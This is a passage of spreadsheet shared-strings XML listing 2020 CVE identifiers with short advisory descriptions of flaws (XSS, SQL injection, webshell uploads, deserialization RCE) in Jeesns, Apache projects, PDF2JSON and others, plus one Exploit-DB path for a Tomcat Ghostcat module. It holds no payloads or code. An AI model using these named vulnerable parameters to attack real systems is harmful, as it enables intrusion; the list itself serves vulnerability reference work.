  <si>
    <t>An Information Disclosure vulnerability exists in dhcms 2017-09-18 when entering invalid characters after the normal interface, which causes an error that will leak the physical path.</t>
  </si>
  <si>
    <t>CVE-2020-1928</t>
  </si>
  <si>
    <t>An information disclosure vulnerability was found in Apache NiFi 1.10.0. The sensitive parameter parser would log parsed values for debugging purposes. This would expose literal values entered in a sensitive property when no parameter was present.</t>
  </si>
  <si>
    <t>CVE-2020-19280</t>
  </si>
  <si>
    <t>Jeesns 1.4.2 contains a cross-site request forgery (CSRF) which allows attackers to escalate privileges and perform sensitive program operations.</t>
  </si>
  <si>
    <t>CVE-2020-19281</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in the /manage/loginusername component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the username field.</t>
  </si>
  <si>
    <t>CVE-2020-19282</t>
  </si>
  <si>
    <t>A reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field.</t>
  </si>
  <si>
    <t>CVE-2020-19283</t>
  </si>
  <si>
    <t>A reflected cross-site scripting (XSS) vulnerability in the /newVersion component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-19284</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in the /group/comment component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the group comments text field.</t>
  </si>
  <si>
    <t>CVE-2020-19285</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in the /group/apply component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the Name text field.</t>
  </si>
  <si>
    <t>CVE-2020-19286</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in the /question/detail component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the source field of the editor.</t>
  </si>
  <si>
    <t>CVE-2020-19287</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in the /group/post component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the title.</t>
  </si>
  <si>
    <t>CVE-2020-19288</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in the /localhost/u component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in a private message.</t>
  </si>
  <si>
    <t>CVE-2020-19289</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in the /member/picture/album component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the new album tab.</t>
  </si>
  <si>
    <t>CVE-2020-1929</t>
  </si>
  <si>
    <t>The Apache Beam MongoDB connector in versions 2.10.0 to 2.16.0 has an option to disable SSL trust verification. However this configuration is not respected and the certificate verification disables trust verification in every case. This exclusion also gets registered globally which disables trust checking for any code running in the same JVM.</t>
  </si>
  <si>
    <t>CVE-2020-19290</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in the /weibo/comment component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the Weibo comment section.</t>
  </si>
  <si>
    <t>CVE-2020-19291</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in the /weibo/publishdata component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in a posted Weibo.</t>
  </si>
  <si>
    <t>CVE-2020-19292</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in the /question/ask component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in a posted question.</t>
  </si>
  <si>
    <t>CVE-2020-19293</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in the /article/add component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in a posted article.</t>
  </si>
  <si>
    <t>CVE-2020-19294</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in the /article/comment component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the article comments section.</t>
  </si>
  <si>
    <t>CVE-2020-19295</t>
  </si>
  <si>
    <t>A reflected cross-site scripting (XSS) vulnerability in the /weibo/topic component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-1930</t>
  </si>
  <si>
    <t>A command execution issue was found in Apache SpamAssassin prior to 3.4.3. Carefully crafted nefarious rule configuration (.cf) files can be configured to run system commands similar to CVE-2018-11805. With this bug unpatched, exploits can be injected in a number of scenarios including the same privileges as spamd is run which may be elevated though doing so remotely is difficult. In addition to upgrading to SA 3.4.4, we again recommend that users should only use update channels or 3rd party .cf files from trusted places. If you cannot upgrade, do not use 3rd party rulesets, do not use sa-compile and do not run spamd as an account with elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-19301</t>
  </si>
  <si>
    <t>A vulnerability in the vae_admin_rule database table of vaeThink v1.0.1 allows attackers to execute arbitrary code via a crafted payload in the condition parameter.</t>
  </si>
  <si>
    <t>CVE-2020-19302</t>
  </si>
  <si>
    <t>An arbitrary file upload vulnerability in the avatar upload function of vaeThink v1.0.1 allows attackers to open a webshell via changing uploaded file suffixes to ".php".</t>
  </si>
  <si>
    <t>CVE-2020-19303</t>
  </si>
  <si>
    <t>An arbitrary file upload vulnerability in /fileupload.php of hdcms 5.7 allows attackers to execute arbitrary code via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-19304</t>
  </si>
  <si>
    <t>An issue in /admin/index.php?n=system&amp;c=filept&amp;a=doGetFileList of Metinfo v7.0.0 allows attackers to perform a directory traversal and access sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-19305</t>
  </si>
  <si>
    <t>An issue in /app/system/column/admin/index.class.php of Metinfo v7.0.0 causes the indeximg parameter to be deleted when the column is deleted, allowing attackers to escalate privileges.</t>
  </si>
  <si>
    <t>CVE-2020-1931</t>
  </si>
  <si>
    <t>A command execution issue was found in Apache SpamAssassin prior to 3.4.3. Carefully crafted nefarious Configuration (.cf) files can be configured to run system commands similar to CVE-2018-11805. This issue is less stealthy and attempts to exploit the issue will throw warnings. Thanks to Damian Lukowski at credativ for reporting the issue ethically. With this bug unpatched, exploits can be injected in a number of scenarios though doing so remotely is difficult. In addition to upgrading to SA 3.4.4, we again recommend that users should only use update channels or 3rd party .cf files from trusted places.</t>
  </si>
  <si>
    <t>CVE-2020-19316</t>
  </si>
  <si>
    <t>OS Command injection vulnerability in function link in Filesystem.php in Laravel Framework before 5.8.17.</t>
  </si>
  <si>
    <t>CVE-2020-1932</t>
  </si>
  <si>
    <t>An information disclosure issue was found in Apache Superset 0.34.0, 0.34.1, 0.35.0, and 0.35.1. Authenticated Apache Superset users are able to retrieve other users' information, including hashed passwords, by accessing an unused and undocumented API endpoint on Apache Superset.</t>
  </si>
  <si>
    <t>CVE-2020-1933</t>
  </si>
  <si>
    <t>A XSS vulnerability was found in Apache NiFi 1.0.0 to 1.10.0. Malicious scripts could be injected to the UI through action by an unaware authenticated user in Firefox. Did not appear to occur in other browsers.</t>
  </si>
  <si>
    <t>CVE-2020-1934</t>
  </si>
  <si>
    <t>In Apache HTTP Server 2.4.0 to 2.4.41, mod_proxy_ftp may use uninitialized memory when proxying to a malicious FTP server.</t>
  </si>
  <si>
    <t>CVE-2020-1935</t>
  </si>
  <si>
    <t>In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.</t>
  </si>
  <si>
    <t>CVE-2020-1936</t>
  </si>
  <si>
    <t>A cross-site scripting issue was found in Apache Ambari Views. This was addressed in Apache Ambari 2.7.4.</t>
  </si>
  <si>
    <t>CVE-2020-19360</t>
  </si>
  <si>
    <t>Local file inclusion in FHEM 6.0 allows in fhem/FileLog_logWrapper file parameter can allow an attacker to include a file, which can lead to sensitive information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-19361</t>
  </si>
  <si>
    <t>Reflected XSS in Medintux v2.16.000 CCAM.php by manipulating the mot1 parameter can result in an attacker performing malicious actions to users who open a maliciously crafted link or third-party web page.</t>
  </si>
  <si>
    <t>CVE-2020-19362</t>
  </si>
  <si>
    <t>Reflected XSS in Vtiger CRM v7.2.0 in vtigercrm/index.php? through the view parameter can result in an attacker performing malicious actions to users who open a maliciously crafted link or third-party web page.</t>
  </si>
  <si>
    <t>CVE-2020-19363</t>
  </si>
  <si>
    <t>Vtiger CRM v7.2.0 allows an attacker to display hidden files, list directories by using /libraries and /layout directories.</t>
  </si>
  <si>
    <t>CVE-2020-19364</t>
  </si>
  <si>
    <t>OpenEMR 5.0.1 allows an authenticated attacker to upload and execute malicious PHP scripts through /controller.php.</t>
  </si>
  <si>
    <t>CVE-2020-1937</t>
  </si>
  <si>
    <t>Kylin has some restful apis which will concatenate SQLs with the user input string, a user is likely to be able to run malicious database queries.</t>
  </si>
  <si>
    <t>CVE-2020-1938</t>
  </si>
  <si>
    <t>When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/49039.rb</t>
  </si>
  <si>
    <t>Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion (Metasploit)</t>
  </si>
  <si>
    <t>CVE-2020-1939</t>
  </si>
  <si>
    <t>The Apache NuttX (Incubating) project provides an optional separate "apps" repository which contains various optional components and example programs. One of these, ftpd, had a NULL pointer dereference bug. The NuttX RTOS itself is not affected. Users of the optional apps repository are affected only if they have enabled ftpd. Versions 6.15 to 8.2 are affected.</t>
  </si>
  <si>
    <t>CVE-2020-1940</t>
  </si>
  <si>
    <t>The optional initial password change and password expiration features present in Apache Jackrabbit Oak 1.2.0 to 1.22.0 are prone to a sensitive information disclosure vulnerability. The code mandates the changed password to be passed as an additional attribute to the credentials object but does not remove it upon processing during the first phase of the authentication. In combination with additional, independent authentication mechanisms, this may lead to the new password being disclosed.</t>
  </si>
  <si>
    <t>CVE-2020-1941</t>
  </si>
  <si>
    <t>In Apache ActiveMQ 5.0.0 to 5.15.11, the webconsole admin GUI is open to XSS, in the view that lists the contents of a queue.</t>
  </si>
  <si>
    <t>CVE-2020-19417</t>
  </si>
  <si>
    <t>Emerson Smart Wireless Gateway 1420 4.6.59 allows non-privileged users (such as the default account 'maint') to perform administrative tasks by sending specially crafted HTTP requests to the application.</t>
  </si>
  <si>
    <t>CVE-2020-19419</t>
  </si>
  <si>
    <t>Incorrect Access Control in Emerson Smart Wireless Gateway 1420 4.6.59 allows remote attackers to obtain sensitive device information from the administrator console without authentication.</t>
  </si>
  <si>
    <t>CVE-2020-1942</t>
  </si>
  <si>
    <t>In Apache NiFi 0.0.1 to 1.11.0, the flow fingerprint factory generated flow fingerprints which included sensitive property descriptor values. In the event a node attempted to join a cluster and the cluster flow was not inheritable, the flow fingerprint of both the cluster and local flow was printed, potentially containing sensitive values in plaintext.</t>
  </si>
  <si>
    <t>CVE-2020-1943</t>
  </si>
  <si>
    <t>Data sent with contentId to /control/stream is not sanitized, allowing XSS attacks in Apache OFBiz 16.11.01 to 16.11.07.</t>
  </si>
  <si>
    <t>CVE-2020-1944</t>
  </si>
  <si>
    <t>There is a vulnerability in Apache Traffic Server 6.0.0 to 6.2.3, 7.0.0 to 7.1.8, and 8.0.0 to 8.0.5 with a smuggling attack and Transfer-Encoding and Content length headers. Upgrade to versions 7.1.9 and 8.0.6 or later versions.</t>
  </si>
  <si>
    <t>CVE-2020-19447</t>
  </si>
  <si>
    <t>SQL injection exists in the jdownloads 3.2.63 component for Joomla! com_jdownloads/models/send.php via the f_marked_files_id parameter.</t>
  </si>
  <si>
    <t>CVE-2020-1945</t>
  </si>
  <si>
    <t>Apache Ant 1.1 to 1.9.14 and 1.10.0 to 1.10.7 uses the default temporary directory identified by the Java system property java.io.tmpdir for several tasks and may thus leak sensitive information. The fixcrlf and replaceregexp tasks also copy files from the temporary directory back into the build tree allowing an attacker to inject modified source files into the build process.</t>
  </si>
  <si>
    <t>CVE-2020-19450</t>
  </si>
  <si>
    <t>SQL injection exists in the jdownloads 3.2.63 component for Joomla! via com_jdownloads/helpers/jdownloadshelper.php, getUserLimits function in the list parameter.</t>
  </si>
  <si>
    <t>CVE-2020-19451</t>
  </si>
  <si>
    <t>SQL injection exists in the jdownloads 3.2.63 component for Joomla! via com_jdownloads/helpers/jdownloadshelper.php, updateLog function via the X-forwarded-for Header parameter.</t>
  </si>
  <si>
    <t>CVE-2020-19455</t>
  </si>
  <si>
    <t>SQL injection exists in the jdownloads 3.2.63 component for Joomla! via components/com_jdownloads/helpers/categories.php, order function via the filter_order parameter.</t>
  </si>
  <si>
    <t>CVE-2020-1946</t>
  </si>
  <si>
    <t>In Apache SpamAssassin before 3.4.5, malicious rule configuration (.cf) files can be configured to run system commands without any output or errors. With this, exploits can be injected in a number of scenarios. In addition to upgrading to SA version 3.4.5, users should only use update channels or 3rd party .cf files from trusted places.</t>
  </si>
  <si>
    <t>CVE-2020-19463</t>
  </si>
  <si>
    <t>An issue has been found in function vfprintf in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to a stack overflow.</t>
  </si>
  <si>
    <t>CVE-2020-19464</t>
  </si>
  <si>
    <t>An issue has been found in function XRef::fetch in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to a stack overflow .</t>
  </si>
  <si>
    <t>CVE-2020-19465</t>
  </si>
  <si>
    <t>An issue has been found in function ObjectStream::getObject in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to an invalid read of size 4 .</t>
  </si>
  <si>
    <t>CVE-2020-19466</t>
  </si>
  <si>
    <t>An issue has been found in function DCTStream::transformDataUnit in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to an invalid read of size 1 .</t>
  </si>
  <si>
    <t>CVE-2020-19467</t>
  </si>
  <si>
    <t>An issue has been found in function DCTStream::transformDataUnit in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to an Illegal Use After Free .</t>
  </si>
  <si>
    <t>CVE-2020-19468</t>
  </si>
  <si>
    <t>An issue has been found in function EmbedStream::getChar in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to a null pointer derefenrece (invalid read of size 8) .</t>
  </si>
  <si>
    <t>CVE-2020-19469</t>
  </si>
  <si>
    <t>An issue has been found in function DCTStream::reset in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to an invalid write of size 8 .</t>
  </si>
  <si>
    <t>CVE-2020-1947</t>
  </si>
  <si>
    <t>In Apache ShardingSphere(incubator) 4.0.0-RC3 and 4.0.0, the ShardingSphere's web console uses the SnakeYAML library for parsing YAML inputs to load datasource configuration. SnakeYAML allows to unmarshal data to a Java type By using the YAML tag. Unmarshalling untrusted data can lead to security flaws of RCE.</t>
  </si>
  <si>
    <t>CVE-2020-19470</t>
  </si>
  <si>
    <t>An issue has been found in function DCTStream::getChar in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to a NULL pointer dereference (invalid read of size 1) .</t>
  </si>
  <si>
    <t>CVE-2020-19471</t>
  </si>
  <si>
    <t>An issue has been found in function DCTStream::decodeImage in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to an invalid read of size 4 .</t>
  </si>
  <si>
    <t>CVE-2020-19472</t>
  </si>
  <si>
    <t>An issue has been found in function DCTStream::readHuffSym in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to an invalid read of size 2 .</t>
  </si>
  <si>
    <t>CVE-2020-19473</t>
  </si>
  <si>
    <t>An issue has been found in function DCTStream::decodeImage in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to an uncaught floating point exception.</t>
  </si>
  <si>
    <t>CVE-2020-19474</t>
  </si>
  <si>
    <t>An issue has been found in function Gfx::doShowText in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to an Use After Free .</t>
  </si>
  <si>
    <t>CVE-2020-19475</t>
  </si>
  <si>
    <t>An issue has been found in function CCITTFaxStream::lookChar in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to an invalid write of size 2 .</t>
  </si>
  <si>
    <t>CVE-2020-1948</t>
  </si>
  <si>
    <t>This vulnerability can affect all Dubbo users stay on version 2.7.6 or lower. An attacker can send RPC requests with unrecognized service name or method name along with some malicious parameter payloads. When the malicious parameter is deserialized, it will execute some malicious code. More details can be found below.</t>
  </si>
  <si>
    <t>CVE-2020-19481</t>
  </si>
  <si>
    <t>An issue was discovered in GPAC before 0.8.0, as demonstrated by MP4Box. It contains an invalid memory read in gf_m2ts_process_pmt in media_tools/mpegts.c that can cause a denial of service via a crafted MP4 file.</t>
  </si>
  <si>
    <t>CVE-2020-19488</t>
  </si>
  <si>
    <t>An issue was discovered in box_code_apple.c:119 in Gpac MP4Box 0.8.0, allows attackers to cause a Denial of Service due to an invalid read on function ilst_item_Read.</t>
  </si>
  <si>
    <t>CVE-2020-1949</t>
  </si>
  <si>
    <t>Scripts in Sling CMS before 0.16.0 do not property escape the Sling Selector from URLs when generating navigational elements for the administrative consoles and are vulnerable to reflected XSS attacks.</t>
  </si>
  <si>
    <t>CVE-2020-19490</t>
  </si>
  <si>
    <t>tinyexr 0.9.5 has a integer overflow over-write in tinyexr::DecodePixelData in tinyexr.h, related to OpenEXR code.</t>
  </si>
  <si>
    <t>CVE-2020-19491</t>
  </si>
  <si>
    <t>There is an invalid memory access bug in cgif.c that leads to a Segmentation fault in sam2p 0.49.4. A crafted input will lead to a denial of service or possibly unspecified other impact.</t>
  </si>
  <si>
    <t>CVE-2020-19492</t>
  </si>
  <si>
    <t>There is a floating point exception in ReadImage that leads to a Segmentation fault in sam2p 0.49.4. A crafted input will lead to a denial of service or possibly unspecified other impact.</t>
  </si>
  <si>
    <t>CVE-2020-19497</t>
  </si>
  <si>
    <t>Integer overflow vulnerability in Mat_VarReadNextInfo5 in mat5.c in tbeu matio (aka MAT File I/O Library) 1.5.17, allows attackers to cause a Denial of Service or possibly other unspecified impacts.</t>
  </si>
  <si>
    <t>CVE-2020-19498</t>
  </si>
  <si>
    <t>Floating point exception in function Fraction in libheif 1.4.0, allows attackers to cause a Denial of Service or possibly other unspecified impacts.</t>
  </si>
  <si>
    <t>CVE-2020-19499</t>
  </si>
  <si>
    <t>An issue was discovered in heif::Box_iref::get_references in libheif 1.4.0, allows attackers to cause a Denial of Service or possibly other unspecified impact due to an invalid memory read.</t>
  </si>
  <si>
    <t>CVE-2020-1950</t>
  </si>
  <si>
    <t>A carefully crafted or corrupt PSD file can cause excessive memory usage in Apache Tika's PSDParser in versions 1.0-1.23.</t>
  </si>
  <si>
    <t>CVE-2020-1951</t>
  </si>
  <si>
    <t>A carefully crafted or corrupt PSD file can cause an infinite loop in Apache Tika's PSDParser in versions 1.0-1.23.</t>
  </si>
  <si>
    <t>CVE-2020-19510</t>
  </si>
  <si>
    <t>Textpattern 4.7.3 contains an aribtrary file load via the file_insert function in include/txp_file.php.</t>
  </si>
  <si>
    <t>CVE-2020-19511</t>
  </si>
  <si>
    <t>Cross Site Scriptiong vulnerability in Typesetter 5.1 via the !1) className and !2) Description fields in index.php/Admin/Classes,</t>
  </si>
  <si>
    <t>CVE-2020-19513</t>
  </si>
  <si>
    <t>Buffer overflow in FinalWire Ltd AIDA64 Engineer 6.00.5100 allows attackers to execute arbitrary code by creating a crafted input that will overwrite the SEH handler.</t>
  </si>
  <si>
    <t>CVE-2020-19515</t>
  </si>
  <si>
    <t>qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php.</t>
  </si>
  <si>
    <t>CVE-2020-1952</t>
  </si>
  <si>
    <t>An issue was found in Apache IoTDB .9.0 to 0.9.1 and 0.8.0 to 0.8.2. When starting IoTDB, the JMX port 31999 is exposed with no certification.Then, clients could execute code remotely.</t>
  </si>
  <si>
    <t>CVE-2020-19527</t>
  </si>
  <si>
    <t>iCMS 7.0.14 attackers to execute arbitrary OS commands via shell metacharacters in the DB_NAME parameter to install/install.php.</t>
  </si>
  <si>
    <t>CVE-2020-1953</t>
  </si>
  <si>
    <t>Apache Commons Configuration uses a third-party library to parse YAML files which by default allows the instantiation of classes if the YAML includes special statements. Apache Commons Configuration versions 2.2, 2.3, 2.4, 2.5, 2.6 did not change the default settings of this library. So if a YAML file was loaded from an untrusted source, it could therefore load and execute code out of the control of the host application.</t>
  </si>
  <si>
    <t>CVE-2020-1954</t>
  </si>
  <si>
    <t>Apache CXF has the ability to integrate with JMX by registering an InstrumentationManager extension with the CXF bus. If the ‘createMBServerConnectorFactory‘ property of the default InstrumentationManagerImpl is not disabled, then it is vulnerable to a man-in-the-middle (MITM) style attack. An attacker on the same host can connect to the registry and rebind the entry to another server, thus acting as a proxy to the original. They are then able to gain access to all of the information that is sent and received over JMX.</t>
  </si>
  <si>
    <t>CVE-2020-19547</t>
  </si>
  <si>
    <t>Directory Traversal vulnerability exists in PopojiCMS 2.0.1 via the id parameter in admin.php.</t>
  </si>
  <si>
    <t>CVE-2020-1955</t>
  </si>
  <si>
    <t>CouchDB version 3.0.0 shipped with a new configuration setting that governs access control to the entire database server called `require_valid_user_except_for_up`. It was meant as an extension to the long standing setting `require_valid_user`, which in turn requires that any and all requests to CouchDB will have to be made with valid credentials, effectively forbidding any anonymous requests. The new `require_valid_user_except_for_up` is an off-by-default setting that was meant to allow requiring valid credentials for all endpoints except for the `/_up` endpoint. However, the implementation of this made an error that lead to not enforcing credentials on any endpoint, when enabled. CouchDB versions 3.0.1[1] and 3.1.0[2] fix this issue.</t>
  </si>
  <si>
    <t>CVE-2020-19551</t>
  </si>
  <si>
    <t>Blacklist bypass issue exists in WUZHI CMS up to and including 4.1.0 in common.func.php, which when uploaded can cause remote code executiong.</t>
  </si>
  <si>
    <t>CVE-2020-19553</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vlnerability exists in WUZHI CMS up to and including 4.1.0 in the config function in coreframe/app/attachment/libs/class/ckditor.class.php.</t>
  </si>
  <si>
    <t>CVE-2020-19554</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in ManageEngine OPManager &lt;=12.5.174 when the API key contains an XML-based XSS payload.</t>
  </si>
  <si>
    <t>CVE-2020-1956</t>
  </si>
  <si>
    <t>Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1 has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation.</t>
  </si>
  <si>
    <t>CVE-2020-1957</t>
  </si>
  <si>
    <t>Apache Shiro before 1.5.2, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.</t>
  </si>
  <si>
    <t>CVE-2020-1958</t>
  </si>
  <si>
    <t>When LDAP authentication is enabled in Apache Druid 0.17.0, callers of Druid APIs with a valid set of LDAP credentials can bypass the credentialsValidator.userSearch filter barrier that determines if a valid LDAP user is allowed to authenticate with Druid. They are still subject to role-based authorization checks, if configured. Callers of Druid APIs can also retrieve any LDAP attribute values of users that exist on the LDAP server, so long as that information is visible to the Druid server. This information disclosure does not require the caller itself to be a valid LDAP user.</t>
  </si>
  <si>
    <t>CVE-2020-19586</t>
  </si>
  <si>
    <t>Incorrect Access Control issue in Yellowfin Business Intelligence 7.3 allows remote attackers to escalate privilege via MIAdminStyles.i4 Admin UI.</t>
  </si>
  <si>
    <t>CVE-2020-19587</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in configMap parameters in Yellowfin Business Intelligence 7.3 allows remote attackers to run arbitrary code via MIAdminStyles.i4 Admin UI.</t>
  </si>
  <si>
    <t>CVE-2020-1959</t>
  </si>
  <si>
    <t>A Server-Side Template Injection was identified in Apache Syncope prior to 2.1.6 enabling attackers to inject arbitrary Java EL expressions, leading to an unauthenticated Remote Code Execution (RCE) vulnerability. Apache Syncope uses Java Bean Validation (JSR 380) custom constraint validators. When building custom constraint violation error messages, they support different types of interpolation, including Java EL expressions. Therefore, if an attacker can inject arbitrary data in the error message template being passed, they will be able to run arbitrary Java code.</t>
  </si>
  <si>
    <t>CVE-2020-19595</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in Core FTP Server v2 Build 697, via a crafted username.</t>
  </si>
  <si>
    <t>CVE-2020-19596</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in Core FTP Server v1.2 Build 583, via a crafted username.</t>
  </si>
  <si>
    <t>CVE-2020-1960</t>
  </si>
  <si>
    <t>A vulnerability in Apache Flink (1.1.0 to 1.1.5, 1.2.0 to 1.2.1, 1.3.0 to 1.3.3, 1.4.0 to 1.4.2, 1.5.0 to 1.5.6, 1.6.0 to 1.6.4, 1.7.0 to 1.7.2, 1.8.0 to 1.8.3, 1.9.0 to 1.9.2, 1.10.0) where, when running a process with an enabled JMXReporter, with a port configured via metrics.reporter.reporter_name&gt;.port, an attacker with local access to the machine and JMX port can execute a man-in-the-middle attack using a specially crafted request to rebind the JMXRMI registry to one under the attacker's control. This compromises any connection established to the process via JMX, allowing extraction of credentials and any other transferred data.</t>
  </si>
  <si>
    <t>CVE-2020-19609</t>
  </si>
  <si>
    <t>Artifex MuPDF before 1.18.0 has a heap based buffer over-write in tiff_expand_colormap() function when parsing TIFF files allowing attackers to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-1961</t>
  </si>
  <si>
    <t>Vulnerability to Server-Side Template Injection on Mail templates for Apache Syncope 2.0.X releases prior to 2.0.15, 2.1.X releases prior to 2.1.6, enabling attackers to inject arbitrary JEXL expressions, leading to Remote Code Execution (RCE) was discovered.</t>
  </si>
  <si>
    <t>CVE-2020-19611</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in redirect module of Racktables version 0.21.2, allows an attacker to inject arbitrary web script or HTML via the op parameter.</t>
  </si>
  <si>
    <t>CVE-2020-19613</t>
  </si>
  <si>
    <t>Server Side Request Forgery (SSRF) vulnerability in saveUrlAs function in ImagesService.java in sunkaifei FlyCMS version 20190503.</t>
  </si>
  <si>
    <t>CVE-2020-19616</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in mblog 3.5 via the post header field to /post/editing.</t>
  </si>
  <si>
    <t>CVE-2020-19617</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in mblog 3.5 via the nickname field to /settings/profile.</t>
  </si>
  <si>
    <t>CVE-2020-19618</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in mblog 3.5 via the post content field to /post/editing.</t>
  </si>
  <si>
    <t>CVE-2020-19619</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in mblog 3.5 via the signature field to /settings/profile.</t>
  </si>
  <si>
    <t>CVE-2020-19625</t>
  </si>
  <si>
    <t>Remote Code Execution Vulnerability in tests/support/stores/test_grid_filter.php in oria gridx 1.3, allows remote attackers to execute arbitrary code, via crafted value to the $query parameter.</t>
  </si>
  <si>
    <t>CVE-2020-19626</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in craftcms 3.1.31, allows remote attackers to inject arbitrary web script or HTML, via /admin/settings/sites/new.</t>
  </si>
  <si>
    <t>CVE-2020-1963</t>
  </si>
  <si>
    <t>Apache Ignite uses H2 database to build SQL distributed execution engine. H2 provides SQL functions which could be used by attacker to access to a filesystem.</t>
  </si>
  <si>
    <t>CVE-2020-19639</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) vulnerability in INSMA Wifi Mini Spy 1080P HD Security IP Camera 1.9.7 B, via all fields to WebUI.</t>
  </si>
  <si>
    <t>CVE-2020-1964</t>
  </si>
  <si>
    <t>It was noticed that Apache Heron 0.20.2-incubating, Release 0.20.1-incubating, and Release v-0.20.0-incubating does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerabilities (CWE-502: Deserialization of Untrusted Data).</t>
  </si>
  <si>
    <t>CVE-2020-19640</t>
  </si>
  <si>
    <t>An issue was discovered in INSMA Wifi Mini Spy 1080P HD Security IP Camera 1.9.7 B. An unauthenticated attacker can reboot the device causing a Denial of Service, via a hidden reboot command to '/media/?action=cmd'.</t>
  </si>
  <si>
    <t>CVE-2020-19641</t>
  </si>
  <si>
    <t>An issue was discovered in INSMA Wifi Mini Spy 1080P HD Security IP Camera 1.9.7 B. Authenticated attackers with the "Operator" Privilege can gain admin privileges via a crafted request to '/goform/formUserMng'.</t>
  </si>
  <si>
    <t>CVE-2020-19642</t>
  </si>
